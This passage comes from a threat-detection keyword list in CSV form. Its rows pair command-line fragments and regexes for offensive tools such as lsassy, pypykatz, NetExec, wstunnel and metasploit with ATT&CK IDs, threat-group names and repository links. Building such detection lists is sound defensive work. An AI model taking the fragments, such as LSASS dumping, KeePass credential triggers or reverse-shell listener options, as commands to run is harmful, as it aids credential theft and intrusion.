PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2024" "* LocalShellExtParse.py*",".{0,1000}\sLocalShellExtParse\.py.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. 
Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","2025" "* localtonet.service*",".{0,1000}\slocaltonet\.service.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","2026" "* --local-to-remote socks5://*",".{0,1000}\s\-\-local\-to\-remote\ssocks5\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2027" "* --local-to-remote stdio://*",".{0,1000}\s\-\-local\-to\-remote\sstdio\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2028" "* --local-to-remote tcp://*",".{0,1000}\s\-\-local\-to\-remote\stcp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data 
Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2029" "* --local-to-remote tproxy+tcp://*",".{0,1000}\s\-\-local\-to\-remote\stproxy\+tcp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2030" "* --local-to-remote tproxy+udp://*",".{0,1000}\s\-\-local\-to\-remote\stproxy\+udp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2031" "* --local-to-remote udp://*",".{0,1000}\s\-\-local\-to\-remote\sudp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","2032" "* -lockless -Command *",".{0,1000}\s\-lockless\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","2034" "* 
--loggedon-users*",".{0,1000}\s\-\-loggedon\-users.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2035" "* loginAAD.ps1*",".{0,1000}\sloginAAD\.ps1.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","2037" "* looneypwner.sh*",".{0,1000}\slooneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","2039" "* --lport 1337 *",".{0,1000}\s\-\-lport\s1337\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - 
T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2040" "* LPORT=4444*",".{0,1000}\sLPORT\=4444.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","2041" "* lsa minidump * -o *",".{0,1000}\slsa\sminidump\s.{0,1000}\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","2042" "* lsa minidump *.dmp*",".{0,1000}\slsa\sminidump\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2043" "* lsa minidump *.dmp*",".{0,1000}\slsa\sminidump\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","2044" "* lsa minidump /*",".{0,1000}\slsa\sminidump\s\/.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","2045" "* lsadump.py*",".{0,1000}\slsadump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","2046" "* lsasecrets.py*",".{0,1000}\slsasecrets\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","2047" "* lsass.dmp*",".{0,1000}\slsass\.dmp.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2048" "* lsass_creds.txt*",".{0,1000}\slsass_creds\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - 
TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2049" "* Lsassx.ps1*",".{0,1000}\sLsassx\.ps1.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","2050" "* Lsassx-OBF.ps1*",".{0,1000}\sLsassx\-OBF\.ps1.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","2051" "* lsassy -k -d *",".{0,1000}\slsassy\s\-k\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2052" "* lsassy*",".{0,1000}\slsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","2053" "* lsassy.dumper*",".{0,1000}\slsassy\.dumper.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active 
Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2054" "* lu-enum.nse*",".{0,1000}\slu\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2055" "* Luna Grabber Builder*",".{0,1000}\sLuna\sGrabber\sBuilder.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","2056" "* LyncSniper.ps1*",".{0,1000}\/LyncSniper\.ps1.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","2057" "* -M dfscoerce *",".{0,1000}\s\-M\sdfscoerce\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2059" "* -M empire_exec -o LISTENER=http-listener*",".{0,1000}\s\-M\sempire_exec\s\-o\sLISTENER\=http\-listener.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2060" "* -m enrichment.cli.submit_to_nemesis*",".{0,1000}\s\-m\senrichment\.cli\.submit_to_nemesis.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2061" "* -M gpp_autologin*",".{0,1000}\s\-M\sgpp_autologin.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 
- TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2062" "* -M handlekatz *",".{0,1000}\s\-M\shandlekatz\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2063" "* -M keepass_discover *",".{0,1000}\s\-M\skeepass_discover\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2064" "* -M keepass_discover*",".{0,1000}\s\-M\skeepass_discover.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2065" "* -M keepass_trigger -o ACTION=ALL USER=*",".{0,1000}\s\-M\skeepass_trigger\s\-o\sACTION\=ALL\sUSER\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - 
TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2066" "* -m lagentcmd *powershell *",".{0,1000}\s\-m\slagentcmd\s.{0,1000}powershell\s.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","2067" "* -M laps --kdcHost *",".{0,1000}\s\-M\slaps\s\-\-kdcHost\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2068" "* -M ldap-checker *",".{0,1000}\s\-M\sldap\-checker\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2069" "* -M ldap-checker *",".{0,1000}\s\-M\sldap\-checker\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2070" "* -M lsassy *",".{0,1000}\s\-M\slsassy\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2071" "* -M MAQ --kdcHost *",".{0,1000}\s\-M\sMAQ\s\-\-kdcHost\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2072" "* -M masky *CA=*",".{0,1000}\s\-M\smasky\s.{0,1000}CA\=.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2073" "* -M ms17-010 *",".{0,1000}\s\-M\sms17\-010\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2074" "* -M mssql_priv *",".{0,1000}\s\-M\smssql_priv\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2075" "* -M multirdp*",".{0,1000}\s\-M\smultirdp.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2076" "* -M nanodump *",".{0,1000}\s\-M\snanodump\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2077" "* -m olecmd -o 
*powershell *",".{0,1000}\s\-m\solecmd\s\-o\s.{0,1000}powershell\s.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","2078" "* -M pe_inject*",".{0,1000}\s\-M\spe_inject.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2079" "* -M petitpotam *",".{0,1000}\s\-M\spetitpotam\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2080" "* -M petitpotam*",".{0,1000}\s\-M\spetitpotam.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active 
Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2081" "* -M printnightmare *",".{0,1000}\s\-M\sprintnightmare\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2082" "* -m privileged-users --full *",".{0,1000}\s\-m\sprivileged\-users\s\-\-full\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2083" "* -M procdump ",".{0,1000}\s\-M\sprocdump\s","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2084" "* -m rdrleakdiag -M masterkeys*",".{0,1000}\s\-m\srdrleakdiag\s\-M\smasterkeys.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential 
Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","2085" "* -m run_command -c *.exe*",".{0,1000}\s\-m\srun_command\s\-c\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","2086" "* -M runasppl *",".{0,1000}\s\-M\srunasppl\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 